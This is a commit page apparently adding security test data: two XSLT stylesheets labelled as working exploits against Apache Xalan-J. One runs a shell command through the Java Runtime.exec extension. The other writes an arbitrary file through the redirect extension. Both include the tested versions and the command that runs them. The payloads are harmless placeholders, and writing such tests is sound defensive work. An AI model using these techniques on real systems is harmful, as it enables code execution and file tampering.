Christian Heimes avatar Christian Heimes committed e8d4667

add two working xalan exploits

Comments (0)

Files changed (2)

xmltestdata/xalan_exec.xsl

+<!-- Tested with xalan-j_2_7_1-bin.zip, Xerces-J-bin.2.11.0.tar.gz on
+     OpenJDK 1.7.0_15
+
+    $ LC_ALL=C java -cp xalan.jar:serializer.jar:xercesImpl.jar:xml-apis.jar \
+      org.apache.xalan.xslt.Process -in simple.xml -xsl xalan_exec.xsl
+-->
+<xsl:stylesheet version="1.0"
+     xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+     xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
+     xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
+     exclude-result-prefixes="rt ob">
+  <xsl:template match="/">
+  <xsl:variable name="runtimeObject" select="rt:getRuntime()"/>
+  <xsl:variable name="command"
+     select="rt:exec($runtimeObject, &apos;/usr/bin/notify-send SomethingBadHappensHere&apos;)"/>
+  <xsl:variable name="commandAsString" select="ob:toString($command)"/>
+  <xsl:value-of select="$commandAsString"/>
+  </xsl:template>
+</xsl:stylesheet>
+

xmltestdata/xalan_write.xsl

+<!-- Tested with xalan-j_2_7_1-bin.zip, Xerces-J-bin.2.11.0.tar.gz on
+     OpenJDK 1.7.0_15
+
+    $ LC_ALL=C java -cp xalan.jar:serializer.jar:xercesImpl.jar:xml-apis.jar \
+      org.apache.xalan.xslt.Process -in simple.xml -xsl xalan_write.xsl
+-->
+<xsl:stylesheet version="1.0"
+    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+    xmlns:redirect="http://xml.apache.org/xalan/redirect"
+    extension-element-prefixes="redirect">
+  <xsl:output omit-xml-declaration="yes" indent="yes"/>
+  <xsl:template match="/">
+    <redirect:write file="xalan_redirect.txt" method="text">
+      <xsl:text>Something bad happens here!&#13;</xsl:text>
+    </redirect:write>
+  </xsl:template>
+</xsl:stylesheet>
+
Tip: Filter by directory path e.g. /media app.js to search for public/media/app.js.
Tip: Use camelCasing e.g. ProjME to search for ProjectModifiedEvent.java.
Tip: Filter by extension type e.g. /repo .js to search for all .js files in the /repo directory.
Tip: Separate your search with spaces e.g. /ssh pom.xml to search for src/ssh/pom.xml.
Tip: Use ↑ and ↓ arrow keys to navigate and return to view the file.
Tip: You can also navigate files with Ctrl+j (next) and Ctrl+k (previous) and view the file with Ctrl+o.
Tip: You can also navigate files with Alt+j (next) and Alt+k (previous) and view the file with Alt+o.